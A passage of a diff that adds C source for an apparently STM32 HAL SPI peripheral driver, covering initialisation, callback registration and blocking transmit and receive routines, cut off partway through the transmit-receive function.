+static void SPI_RxISR_16BITCRC(struct __SPI_HandleTypeDef *hspi); +static void SPI_2linesRxISR_8BITCRC(struct __SPI_HandleTypeDef *hspi); +static void SPI_2linesRxISR_16BITCRC(struct __SPI_HandleTypeDef *hspi); +#endif /* USE_SPI_CRC */ +static void SPI_AbortRx_ISR(SPI_HandleTypeDef *hspi); +static void SPI_AbortTx_ISR(SPI_HandleTypeDef *hspi); +static void SPI_CloseRxTx_ISR(SPI_HandleTypeDef *hspi); +static void SPI_CloseRx_ISR(SPI_HandleTypeDef *hspi); +static void SPI_CloseTx_ISR(SPI_HandleTypeDef *hspi); +static HAL_StatusTypeDef SPI_EndRxTransaction(SPI_HandleTypeDef *hspi, uint32_t Timeout, uint32_t Tickstart); +static HAL_StatusTypeDef SPI_EndRxTxTransaction(SPI_HandleTypeDef *hspi, uint32_t Timeout, uint32_t Tickstart); +/** + * @} + */ + +/* Exported functions --------------------------------------------------------*/ +/** @defgroup SPI_Exported_Functions SPI Exported Functions + * @{ + */ + +/** @defgroup SPI_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and de-initialization functions ##### + =============================================================================== + [..] This subsection provides a set of functions allowing to initialize and + de-initialize the SPIx peripheral: + + (+) User must implement HAL_SPI_MspInit() function in which he configures + all related peripherals resources (CLOCK, GPIO, DMA, IT and NVIC ). + + (+) Call the function HAL_SPI_Init() to configure the selected device with + the selected configuration: + (++) Mode + (++) Direction + (++) Data Size + (++) Clock Polarity and Phase + (++) NSS Management + (++) BaudRate Prescaler + (++) FirstBit + (++) TIMode + (++) CRC Calculation + (++) CRC Polynomial if CRC enabled + + (+) Call the function HAL_SPI_DeInit() to restore the default configuration + of the selected SPIx peripheral. + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the SPI according to the specified parameters + * in the SPI_InitTypeDef and initialize the associated handle. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPI_Init(SPI_HandleTypeDef *hspi) +{ + /* Check the SPI handle allocation */ + if (hspi == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_SPI_ALL_INSTANCE(hspi->Instance)); + assert_param(IS_SPI_MODE(hspi->Init.Mode)); + assert_param(IS_SPI_DIRECTION(hspi->Init.Direction)); + assert_param(IS_SPI_DATASIZE(hspi->Init.DataSize)); + assert_param(IS_SPI_NSS(hspi->Init.NSS)); + assert_param(IS_SPI_BAUDRATE_PRESCALER(hspi->Init.BaudRatePrescaler)); + assert_param(IS_SPI_FIRST_BIT(hspi->Init.FirstBit)); + assert_param(IS_SPI_TIMODE(hspi->Init.TIMode)); + if (hspi->Init.TIMode == SPI_TIMODE_DISABLE) + { + assert_param(IS_SPI_CPOL(hspi->Init.CLKPolarity)); + assert_param(IS_SPI_CPHA(hspi->Init.CLKPhase)); + + if (hspi->Init.Mode == SPI_MODE_MASTER) + { + assert_param(IS_SPI_BAUDRATE_PRESCALER(hspi->Init.BaudRatePrescaler)); + } + else + { + /* Baudrate prescaler not use in Motoraola Slave mode. force to default value */ + hspi->Init.BaudRatePrescaler = SPI_BAUDRATEPRESCALER_2; + } + } + else + { + assert_param(IS_SPI_BAUDRATE_PRESCALER(hspi->Init.BaudRatePrescaler)); + + /* Force polarity and phase to TI protocaol requirements */ + hspi->Init.CLKPolarity = SPI_POLARITY_LOW; + hspi->Init.CLKPhase = SPI_PHASE_1EDGE; + } +#if (USE_SPI_CRC != 0U) + assert_param(IS_SPI_CRC_CALCULATION(hspi->Init.CRCCalculation)); + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + assert_param(IS_SPI_CRC_POLYNOMIAL(hspi->Init.CRCPolynomial)); + } +#else + hspi->Init.CRCCalculation = SPI_CRCCALCULATION_DISABLE; +#endif /* USE_SPI_CRC */ + + if (hspi->State == HAL_SPI_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hspi->Lock = HAL_UNLOCKED; + +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + /* Init the SPI Callback settings */ + hspi->TxCpltCallback = HAL_SPI_TxCpltCallback; /* Legacy weak TxCpltCallback */ + hspi->RxCpltCallback = HAL_SPI_RxCpltCallback; /* Legacy weak RxCpltCallback */ + hspi->TxRxCpltCallback = HAL_SPI_TxRxCpltCallback; /* Legacy weak TxRxCpltCallback */ + hspi->TxHalfCpltCallback = HAL_SPI_TxHalfCpltCallback; /* Legacy weak TxHalfCpltCallback */ + hspi->RxHalfCpltCallback = HAL_SPI_RxHalfCpltCallback; /* Legacy weak RxHalfCpltCallback */ + hspi->TxRxHalfCpltCallback = HAL_SPI_TxRxHalfCpltCallback; /* Legacy weak TxRxHalfCpltCallback */ + hspi->ErrorCallback = HAL_SPI_ErrorCallback; /* Legacy weak ErrorCallback */ + hspi->AbortCpltCallback = HAL_SPI_AbortCpltCallback; /* Legacy weak AbortCpltCallback */ + + if (hspi->MspInitCallback == NULL) + { + hspi->MspInitCallback = HAL_SPI_MspInit; /* Legacy weak MspInit */ + } + + /* Init the low level hardware : GPIO, CLOCK, NVIC... */ + hspi->MspInitCallback(hspi); +#else + /* Init the low level hardware : GPIO, CLOCK, NVIC... */ + HAL_SPI_MspInit(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ + } + + hspi->State = HAL_SPI_STATE_BUSY; + + /* Disable the selected SPI peripheral */ + __HAL_SPI_DISABLE(hspi); + + /*----------------------- SPIx CR1 & CR2 Configuration ---------------------*/ + /* Configure : SPI Mode, Communication Mode, Data size, Clock polarity and phase, NSS management, + Communication speed, First bit and CRC calculation state */ + WRITE_REG(hspi->Instance->CR1, ((hspi->Init.Mode & (SPI_CR1_MSTR | SPI_CR1_SSI)) | + (hspi->Init.Direction & (SPI_CR1_RXONLY | SPI_CR1_BIDIMODE)) | + (hspi->Init.DataSize & SPI_CR1_DFF) | + (hspi->Init.CLKPolarity & SPI_CR1_CPOL) | + (hspi->Init.CLKPhase & SPI_CR1_CPHA) | + (hspi->Init.NSS & SPI_CR1_SSM) | + (hspi->Init.BaudRatePrescaler & SPI_CR1_BR_Msk) | + (hspi->Init.FirstBit & SPI_CR1_LSBFIRST) | + (hspi->Init.CRCCalculation & SPI_CR1_CRCEN))); + + /* Configure : NSS management, TI Mode */ + WRITE_REG(hspi->Instance->CR2, (((hspi->Init.NSS >> 16U) & SPI_CR2_SSOE) | (hspi->Init.TIMode & SPI_CR2_FRF))); + +#if (USE_SPI_CRC != 0U) + /*---------------------------- SPIx CRCPOLY Configuration ------------------*/ + /* Configure : CRC Polynomial */ + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + WRITE_REG(hspi->Instance->CRCPR, (hspi->Init.CRCPolynomial & SPI_CRCPR_CRCPOLY_Msk)); + } +#endif /* USE_SPI_CRC */ + +#if defined(SPI_I2SCFGR_I2SMOD) + /* Activate the SPI mode (Make sure that I2SMOD bit in I2SCFGR register is reset) */ + CLEAR_BIT(hspi->Instance->I2SCFGR, SPI_I2SCFGR_I2SMOD); +#endif /* SPI_I2SCFGR_I2SMOD */ + + hspi->ErrorCode = HAL_SPI_ERROR_NONE; + hspi->State = HAL_SPI_STATE_READY; + + return HAL_OK; +} + +/** + * @brief De-Initialize the SPI peripheral. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPI_DeInit(SPI_HandleTypeDef *hspi) +{ + /* Check the SPI handle allocation */ + if (hspi == NULL) + { + return HAL_ERROR; + } + + /* Check SPI Instance parameter */ + assert_param(IS_SPI_ALL_INSTANCE(hspi->Instance)); + + hspi->State = HAL_SPI_STATE_BUSY; + + /* Disable the SPI Peripheral Clock */ + __HAL_SPI_DISABLE(hspi); + +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + if (hspi->MspDeInitCallback == NULL) + { + hspi->MspDeInitCallback = HAL_SPI_MspDeInit; /* Legacy weak MspDeInit */ + } + + /* DeInit the low level hardware: GPIO, CLOCK, NVIC... */ + hspi->MspDeInitCallback(hspi); +#else + /* DeInit the low level hardware: GPIO, CLOCK, NVIC... */ + HAL_SPI_MspDeInit(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ + + hspi->ErrorCode = HAL_SPI_ERROR_NONE; + hspi->State = HAL_SPI_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hspi); + + return HAL_OK; +} + +/** + * @brief Initialize the SPI MSP. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +__weak void HAL_SPI_MspInit(SPI_HandleTypeDef *hspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hspi); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SPI_MspInit should be implemented in the user file + */ +} + +/** + * @brief De-Initialize the SPI MSP. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +__weak void HAL_SPI_MspDeInit(SPI_HandleTypeDef *hspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hspi); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SPI_MspDeInit should be implemented in the user file + */ +} + +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) +/** + * @brief Register a User SPI Callback + * To be used instead of the weak predefined callback + * @param hspi Pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for the specified SPI. + * @param CallbackID ID of the callback to be registered + * @param pCallback pointer to the Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPI_RegisterCallback(SPI_HandleTypeDef *hspi, HAL_SPI_CallbackIDTypeDef CallbackID, + pSPI_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hspi->ErrorCode |= HAL_SPI_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hspi); + + if (HAL_SPI_STATE_READY == hspi->State) + { + switch (CallbackID) + { + case HAL_SPI_TX_COMPLETE_CB_ID : + hspi->TxCpltCallback = pCallback; + break; + + case HAL_SPI_RX_COMPLETE_CB_ID : + hspi->RxCpltCallback = pCallback; + break; + + case HAL_SPI_TX_RX_COMPLETE_CB_ID : + hspi->TxRxCpltCallback = pCallback; + break; + + case HAL_SPI_TX_HALF_COMPLETE_CB_ID : + hspi->TxHalfCpltCallback = pCallback; + break; + + case HAL_SPI_RX_HALF_COMPLETE_CB_ID : + hspi->RxHalfCpltCallback = pCallback; + break; + + case HAL_SPI_TX_RX_HALF_COMPLETE_CB_ID : + hspi->TxRxHalfCpltCallback = pCallback; + break; + + case HAL_SPI_ERROR_CB_ID : + hspi->ErrorCallback = pCallback; + break; + + case HAL_SPI_ABORT_CB_ID : + hspi->AbortCpltCallback = pCallback; + break; + + case HAL_SPI_MSPINIT_CB_ID : + hspi->MspInitCallback = pCallback; + break; + + case HAL_SPI_MSPDEINIT_CB_ID : + hspi->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_INVALID_CALLBACK); + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_SPI_STATE_RESET == hspi->State) + { + switch (CallbackID) + { + case HAL_SPI_MSPINIT_CB_ID : + hspi->MspInitCallback = pCallback; + break; + + case HAL_SPI_MSPDEINIT_CB_ID : + hspi->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_INVALID_CALLBACK); + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_INVALID_CALLBACK); + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hspi); + return status; +} + +/** + * @brief Unregister an SPI Callback + * SPI callback is redirected to the weak predefined callback + * @param hspi Pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for the specified SPI. + * @param CallbackID ID of the callback to be unregistered + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPI_UnRegisterCallback(SPI_HandleTypeDef *hspi, HAL_SPI_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hspi); + + if (HAL_SPI_STATE_READY == hspi->State) + { + switch (CallbackID) + { + case HAL_SPI_TX_COMPLETE_CB_ID : + hspi->TxCpltCallback = HAL_SPI_TxCpltCallback; /* Legacy weak TxCpltCallback */ + break; + + case HAL_SPI_RX_COMPLETE_CB_ID : + hspi->RxCpltCallback = HAL_SPI_RxCpltCallback; /* Legacy weak RxCpltCallback */ + break; + + case HAL_SPI_TX_RX_COMPLETE_CB_ID : + hspi->TxRxCpltCallback = HAL_SPI_TxRxCpltCallback; /* Legacy weak TxRxCpltCallback */ + break; + + case HAL_SPI_TX_HALF_COMPLETE_CB_ID : + hspi->TxHalfCpltCallback = HAL_SPI_TxHalfCpltCallback; /* Legacy weak TxHalfCpltCallback */ + break; + + case HAL_SPI_RX_HALF_COMPLETE_CB_ID : + hspi->RxHalfCpltCallback = HAL_SPI_RxHalfCpltCallback; /* Legacy weak RxHalfCpltCallback */ + break; + + case HAL_SPI_TX_RX_HALF_COMPLETE_CB_ID : + hspi->TxRxHalfCpltCallback = HAL_SPI_TxRxHalfCpltCallback; /* Legacy weak TxRxHalfCpltCallback */ + break; + + case HAL_SPI_ERROR_CB_ID : + hspi->ErrorCallback = HAL_SPI_ErrorCallback; /* Legacy weak ErrorCallback */ + break; + + case HAL_SPI_ABORT_CB_ID : + hspi->AbortCpltCallback = HAL_SPI_AbortCpltCallback; /* Legacy weak AbortCpltCallback */ + break; + + case HAL_SPI_MSPINIT_CB_ID : + hspi->MspInitCallback = HAL_SPI_MspInit; /* Legacy weak MspInit */ + break; + + case HAL_SPI_MSPDEINIT_CB_ID : + hspi->MspDeInitCallback = HAL_SPI_MspDeInit; /* Legacy weak MspDeInit */ + break; + + default : + /* Update the error code */ + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_INVALID_CALLBACK); + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_SPI_STATE_RESET == hspi->State) + { + switch (CallbackID) + { + case HAL_SPI_MSPINIT_CB_ID : + hspi->MspInitCallback = HAL_SPI_MspInit; /* Legacy weak MspInit */ + break; + + case HAL_SPI_MSPDEINIT_CB_ID : + hspi->MspDeInitCallback = HAL_SPI_MspDeInit; /* Legacy weak MspDeInit */ + break; + + default : + /* Update the error code */ + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_INVALID_CALLBACK); + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_INVALID_CALLBACK); + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hspi); + return status; +} +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ +/** + * @} + */ + +/** @defgroup SPI_Exported_Functions_Group2 IO operation functions + * @brief Data transfers functions + * +@verbatim + ============================================================================== + ##### IO operation functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to manage the SPI + data transfers. + + [..] The SPI supports master and slave mode : + + (#) There are two modes of transfer: + (++) Blocking mode: The communication is performed in polling mode. + The HAL status of all data processing is returned by the same function + after finishing transfer. + (++) No-Blocking mode: The communication is performed using Interrupts + or DMA, These APIs return the HAL status. + The end of the data processing will be indicated through the + dedicated SPI IRQ when using Interrupt mode or the DMA IRQ when + using DMA mode. + The HAL_SPI_TxCpltCallback(), HAL_SPI_RxCpltCallback() and HAL_SPI_TxRxCpltCallback() user callbacks + will be executed respectively at the end of the transmit or Receive process + The HAL_SPI_ErrorCallback()user callback will be executed when a communication error is detected + + (#) APIs provided for these 2 transfer modes (Blocking mode or Non blocking mode using either Interrupt or DMA) + exist for 1Line (simplex) and 2Lines (full duplex) modes. + +@endverbatim + * @{ + */ + +/** + * @brief Transmit an amount of data in blocking mode. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @param pData pointer to data buffer + * @param Size amount of data to be sent + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPI_Transmit(SPI_HandleTypeDef *hspi, uint8_t *pData, uint16_t Size, uint32_t Timeout) +{ + uint32_t tickstart; + HAL_StatusTypeDef errorcode = HAL_OK; + uint16_t initial_TxXferCount; + + /* Check Direction parameter */ + assert_param(IS_SPI_DIRECTION_2LINES_OR_1LINE(hspi->Init.Direction)); + + /* Process Locked */ + __HAL_LOCK(hspi); + + /* Init tickstart for timeout management*/ + tickstart = HAL_GetTick(); + initial_TxXferCount = Size; + + if (hspi->State != HAL_SPI_STATE_READY) + { + errorcode = HAL_BUSY; + goto error; + } + + if ((pData == NULL) || (Size == 0U)) + { + errorcode = HAL_ERROR; + goto error; + } + + /* Set the transaction information */ + hspi->State = HAL_SPI_STATE_BUSY_TX; + hspi->ErrorCode = HAL_SPI_ERROR_NONE; + hspi->pTxBuffPtr = (uint8_t *)pData; + hspi->TxXferSize = Size; + hspi->TxXferCount = Size; + + /*Init field not used in handle to zero */ + hspi->pRxBuffPtr = (uint8_t *)NULL; + hspi->RxXferSize = 0U; + hspi->RxXferCount = 0U; + hspi->TxISR = NULL; + hspi->RxISR = NULL; + + /* Configure communication direction : 1Line */ + if (hspi->Init.Direction == SPI_DIRECTION_1LINE) + { + /* Disable SPI Peripheral before set 1Line direction (BIDIOE bit) */ + __HAL_SPI_DISABLE(hspi); + SPI_1LINE_TX(hspi); + } + +#if (USE_SPI_CRC != 0U) + /* Reset CRC Calculation */ + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + SPI_RESET_CRC(hspi); + } +#endif /* USE_SPI_CRC */ + + /* Check if the SPI is already enabled */ + if ((hspi->Instance->CR1 & SPI_CR1_SPE) != SPI_CR1_SPE) + { + /* Enable SPI peripheral */ + __HAL_SPI_ENABLE(hspi); + } + + /* Transmit data in 16 Bit mode */ + if (hspi->Init.DataSize == SPI_DATASIZE_16BIT) + { + if ((hspi->Init.Mode == SPI_MODE_SLAVE) || (initial_TxXferCount == 0x01U)) + { + hspi->Instance->DR = *((uint16_t *)hspi->pTxBuffPtr); + hspi->pTxBuffPtr += sizeof(uint16_t); + hspi->TxXferCount--; + } + /* Transmit data in 16 Bit mode */ + while (hspi->TxXferCount > 0U) + { + /* Wait until TXE flag is set to send data */ + if (__HAL_SPI_GET_FLAG(hspi, SPI_FLAG_TXE)) + { + hspi->Instance->DR = *((uint16_t *)hspi->pTxBuffPtr); + hspi->pTxBuffPtr += sizeof(uint16_t); + hspi->TxXferCount--; + } + else + { + /* Timeout management */ + if ((((HAL_GetTick() - tickstart) >= Timeout) && (Timeout != HAL_MAX_DELAY)) || (Timeout == 0U)) + { + errorcode = HAL_TIMEOUT; + goto error; + } + } + } + } + /* Transmit data in 8 Bit mode */ + else + { + if ((hspi->Init.Mode == SPI_MODE_SLAVE) || (initial_TxXferCount == 0x01U)) + { + *((__IO uint8_t *)&hspi->Instance->DR) = (*hspi->pTxBuffPtr); + hspi->pTxBuffPtr += sizeof(uint8_t); + hspi->TxXferCount--; + } + while (hspi->TxXferCount > 0U) + { + /* Wait until TXE flag is set to send data */ + if (__HAL_SPI_GET_FLAG(hspi, SPI_FLAG_TXE)) + { + *((__IO uint8_t *)&hspi->Instance->DR) = (*hspi->pTxBuffPtr); + hspi->pTxBuffPtr += sizeof(uint8_t); + hspi->TxXferCount--; + } + else + { + /* Timeout management */ + if ((((HAL_GetTick() - tickstart) >= Timeout) && (Timeout != HAL_MAX_DELAY)) || (Timeout == 0U)) + { + errorcode = HAL_TIMEOUT; + goto error; + } + } + } + } +#if (USE_SPI_CRC != 0U) + /* Enable CRC Transmission */ + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + SET_BIT(hspi->Instance->CR1, SPI_CR1_CRCNEXT); + } +#endif /* USE_SPI_CRC */ + + /* Check the end of the transaction */ + if (SPI_EndRxTxTransaction(hspi, Timeout, tickstart) != HAL_OK) + { + hspi->ErrorCode = HAL_SPI_ERROR_FLAG; + } + + /* Clear overrun flag in 2 Lines communication mode because received is not read */ + if (hspi->Init.Direction == SPI_DIRECTION_2LINES) + { + __HAL_SPI_CLEAR_OVRFLAG(hspi); + } + + if (hspi->ErrorCode != HAL_SPI_ERROR_NONE) + { + errorcode = HAL_ERROR; + } + +error: + hspi->State = HAL_SPI_STATE_READY; + /* Process Unlocked */ + __HAL_UNLOCK(hspi); + return errorcode; +} + +/** + * @brief Receive an amount of data in blocking mode. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @param pData pointer to data buffer + * @param Size amount of data to be received + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPI_Receive(SPI_HandleTypeDef *hspi, uint8_t *pData, uint16_t Size, uint32_t Timeout) +{ +#if (USE_SPI_CRC != 0U) + __IO uint32_t tmpreg = 0U; +#endif /* USE_SPI_CRC */ + uint32_t tickstart; + HAL_StatusTypeDef errorcode = HAL_OK; + + if ((hspi->Init.Mode == SPI_MODE_MASTER) && (hspi->Init.Direction == SPI_DIRECTION_2LINES)) + { + hspi->State = HAL_SPI_STATE_BUSY_RX; + /* Call transmit-receive function to send Dummy data on Tx line and generate clock on CLK line */ + return HAL_SPI_TransmitReceive(hspi, pData, pData, Size, Timeout); + } + + /* Process Locked */ + __HAL_LOCK(hspi); + + /* Init tickstart for timeout management*/ + tickstart = HAL_GetTick(); + + if (hspi->State != HAL_SPI_STATE_READY) + { + errorcode = HAL_BUSY; + goto error; + } + + if ((pData == NULL) || (Size == 0U)) + { + errorcode = HAL_ERROR; + goto error; + } + + /* Set the transaction information */ + hspi->State = HAL_SPI_STATE_BUSY_RX; + hspi->ErrorCode = HAL_SPI_ERROR_NONE; + hspi->pRxBuffPtr = (uint8_t *)pData; + hspi->RxXferSize = Size; + hspi->RxXferCount = Size; + + /*Init field not used in handle to zero */ + hspi->pTxBuffPtr = (uint8_t *)NULL; + hspi->TxXferSize = 0U; + hspi->TxXferCount = 0U; + hspi->RxISR = NULL; + hspi->TxISR = NULL; + +#if (USE_SPI_CRC != 0U) + /* Reset CRC Calculation */ + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + SPI_RESET_CRC(hspi); + /* this is done to handle the CRCNEXT before the latest data */ + hspi->RxXferCount--; + } +#endif /* USE_SPI_CRC */ + + /* Configure communication direction: 1Line */ + if (hspi->Init.Direction == SPI_DIRECTION_1LINE) + { + /* Disable SPI Peripheral before set 1Line direction (BIDIOE bit) */ + __HAL_SPI_DISABLE(hspi); + SPI_1LINE_RX(hspi); + } + + /* Check if the SPI is already enabled */ + if ((hspi->Instance->CR1 & SPI_CR1_SPE) != SPI_CR1_SPE) + { + /* Enable SPI peripheral */ + __HAL_SPI_ENABLE(hspi); + } + + /* Receive data in 8 Bit mode */ + if (hspi->Init.DataSize == SPI_DATASIZE_8BIT) + { + /* Transfer loop */ + while (hspi->RxXferCount > 0U) + { + /* Check the RXNE flag */ + if (__HAL_SPI_GET_FLAG(hspi, SPI_FLAG_RXNE)) + { + /* read the received data */ + (* (uint8_t *)hspi->pRxBuffPtr) = *(__IO uint8_t *)&hspi->Instance->DR; + hspi->pRxBuffPtr += sizeof(uint8_t); + hspi->RxXferCount--; + } + else + { + /* Timeout management */ + if ((((HAL_GetTick() - tickstart) >= Timeout) && (Timeout != HAL_MAX_DELAY)) || (Timeout == 0U)) + { + errorcode = HAL_TIMEOUT; + goto error; + } + } + } + } + else + { + /* Transfer loop */ + while (hspi->RxXferCount > 0U) + { + /* Check the RXNE flag */ + if (__HAL_SPI_GET_FLAG(hspi, SPI_FLAG_RXNE)) + { + *((uint16_t *)hspi->pRxBuffPtr) = (uint16_t)hspi->Instance->DR; + hspi->pRxBuffPtr += sizeof(uint16_t); + hspi->RxXferCount--; + } + else + { + /* Timeout management */ + if ((((HAL_GetTick() - tickstart) >= Timeout) && (Timeout != HAL_MAX_DELAY)) || (Timeout == 0U)) + { + errorcode = HAL_TIMEOUT; + goto error; + } + } + } + } + +#if (USE_SPI_CRC != 0U) + /* Handle the CRC Transmission */ + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + /* freeze the CRC before the latest data */ + SET_BIT(hspi->Instance->CR1, SPI_CR1_CRCNEXT); + + /* Read the latest data */ + if (SPI_WaitFlagStateUntilTimeout(hspi, SPI_FLAG_RXNE, SET, Timeout, tickstart) != HAL_OK) + { + /* the latest data has not been received */ + errorcode = HAL_TIMEOUT; + goto error; + } + + /* Receive last data in 16 Bit mode */ + if (hspi->Init.DataSize == SPI_DATASIZE_16BIT) + { + *((uint16_t *)hspi->pRxBuffPtr) = (uint16_t)hspi->Instance->DR; + } + /* Receive last data in 8 Bit mode */ + else + { + (*(uint8_t *)hspi->pRxBuffPtr) = *(__IO uint8_t *)&hspi->Instance->DR; + } + + /* Wait the CRC data */ + if (SPI_WaitFlagStateUntilTimeout(hspi, SPI_FLAG_RXNE, SET, Timeout, tickstart) != HAL_OK) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_CRC); + errorcode = HAL_TIMEOUT; + goto error; + } + + /* Read CRC to Flush DR and RXNE flag */ + tmpreg = READ_REG(hspi->Instance->DR); + /* To avoid GCC warning */ + UNUSED(tmpreg); + } +#endif /* USE_SPI_CRC */ + + /* Check the end of the transaction */ + if (SPI_EndRxTransaction(hspi, Timeout, tickstart) != HAL_OK) + { + hspi->ErrorCode = HAL_SPI_ERROR_FLAG; + } + +#if (USE_SPI_CRC != 0U) + /* Check if CRC error occurred */ + if (__HAL_SPI_GET_FLAG(hspi, SPI_FLAG_CRCERR)) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_CRC); + __HAL_SPI_CLEAR_CRCERRFLAG(hspi); + } +#endif /* USE_SPI_CRC */ + + if (hspi->ErrorCode != HAL_SPI_ERROR_NONE) + { + errorcode = HAL_ERROR; + } + +error : + hspi->State = HAL_SPI_STATE_READY; + __HAL_UNLOCK(hspi); + return errorcode; +} + +/** + * @brief Transmit and Receive an amount of data in blocking mode. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @param pTxData pointer to transmission data buffer + * @param pRxData pointer to reception data buffer + * @param Size amount of data to be sent and received + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPI_TransmitReceive(SPI_HandleTypeDef *hspi, uint8_t *pTxData, uint8_t *pRxData, uint16_t Size, + uint32_t Timeout) +{ + uint16_t initial_TxXferCount; + uint32_t tmp_mode; + HAL_SPI_StateTypeDef tmp_state; + uint32_t tickstart; +#if (USE_SPI_CRC != 0U) + __IO uint32_t tmpreg = 0U; +#endif /* USE_SPI_CRC */ + + /* Variable used to alternate Rx and Tx during transfer */ + uint32_t txallowed = 1U; + HAL_StatusTypeDef errorcode = HAL_OK; + + /* Check Direction parameter */ + assert_param(IS_SPI_DIRECTION_2LINES(hspi->Init.Direction)); + + /* Process Locked */ + __HAL_LOCK(hspi); + + /* Init tickstart for timeout management*/ + tickstart = HAL_GetTick(); + + /* Init temporary variables */ + tmp_state = hspi->State; + tmp_mode = hspi->Init.Mode; + initial_TxXferCount = Size; + + if (!((tmp_state == HAL_SPI_STATE_READY) || \ + ((tmp_mode == SPI_MODE_MASTER) && (hspi->Init.Direction == SPI_DIRECTION_2LINES) && (tmp_state == HAL_SPI_STATE_BUSY_RX)))) + { + errorcode = HAL_BUSY; + goto error; + } + + if ((pTxData == NULL) || (pRxData == NULL) || (Size == 0U)) + { + errorcode = HAL_ERROR; + goto error; + } + + /* Don't overwrite in case of HAL_SPI_STATE_BUSY_RX */ + if (hspi->State != HAL_SPI_STATE_BUSY_RX) + { + hspi->State = HAL_SPI_STATE_BUSY_TX_RX; + } + + /* Set the transaction information */ + hspi->ErrorCode = HAL_SPI_ERROR_NONE; + hspi->pRxBuffPtr = (uint8_t *)pRxData; + hspi->RxXferCount = Size; + hspi->RxXferSize = Size; + hspi->pTxBuffPtr = (uint8_t *)pTxData; + hspi->TxXferCount = Size; + hspi->TxXferSize = Size; + + /*Init field not used in handle to zero */ + hspi->RxISR = NULL; + hspi->TxISR = NULL; + +#if (USE_SPI_CRC != 0U) + /* Reset CRC Calculation */ + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + SPI_RESET_CRC(hspi); + } +#endif /* USE_SPI_CRC */ + + /* Check if the SPI is already enabled */ + if ((hspi->Instance->CR1 & SPI_CR1_SPE) != SPI_CR1_SPE) + { + /* Enable SPI peripheral */ + __HAL_SPI_ENABLE(hspi); + } + + /* Transmit and Receive data in 16 Bit mode */ + if (hspi->Init.DataSize == SPI_DATASIZE_16BIT) + { + if ((hspi->Init.Mode == SPI_MODE_SLAVE) || (initial_TxXferCount == 0x01U)) + { + hspi->Instance->DR = *((uint16_t *)hspi->pTxBuffPtr); + hspi->pTxBuffPtr += sizeof(uint16_t); + hspi->TxXferCount--; + } + while ((hspi->TxXferCount > 0U) || (hspi->RxXferCount > 0U)) + { + /* Check TXE flag */ + if ((__HAL_SPI_GET_FLAG(hspi, SPI_FLAG_TXE)) && (hspi->TxXferCount > 0U) && (txallowed == 1U)) + { + hspi->Instance->DR = *((uint16_t *)hspi->pTxBuffPtr); + 